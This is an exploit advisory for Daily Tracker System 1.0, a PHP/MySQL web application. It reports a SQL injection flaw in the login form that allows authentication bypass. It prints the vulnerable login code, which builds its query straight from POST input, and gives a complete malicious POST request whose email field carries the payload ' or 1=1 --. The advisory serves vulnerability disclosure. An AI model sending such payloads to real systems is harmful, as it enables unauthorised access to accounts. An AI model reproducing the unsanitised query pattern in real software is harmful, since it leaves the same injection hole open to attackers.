Daily Tracker System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
4f5a24a83647c98bdc4387fb5214ec35
# Exploit Title: Daily Tracker System 1.0 - Authentication Bypass
# Exploit Author: Adeeb Shah (@hyd3sec)
# Credit to Bobby Cooke
# Date: July 29th, 2020
# Vendor Homepage: https://www.sourcecodetester.com
# Software Link: https://www.sourcecodester.com/download-code?nid=14372&title=Daily+Tracker+System+in+PHP%2FMySQL
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
# Vulnerable Source Code
if(isset($_POST['login']))
{
$email=$_POST['email'];
$password=md5($_POST['password']);
$query=mysqli_query($con,"select ID from tbluser where Email='$email' &&
Password='$password ' ");
$ret=mysqli_fetch_array($query);
if($ret>0){
$_SESSION['detsuid']=$ret['ID'];
header('location:dashboard.php');
}
else{
$msg="Invalid Details.";
}
}
?>
# Malicious POST Request to https://TARGET/dets/index.php HTTP/1.1
POST /dets/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.65.130/dets/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
DNT: 1
Connection: close
Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s
Upgrade-Insecure-Requests: 1
email='+or+1%3d1+--+hyd3sec&password=badPass&login=login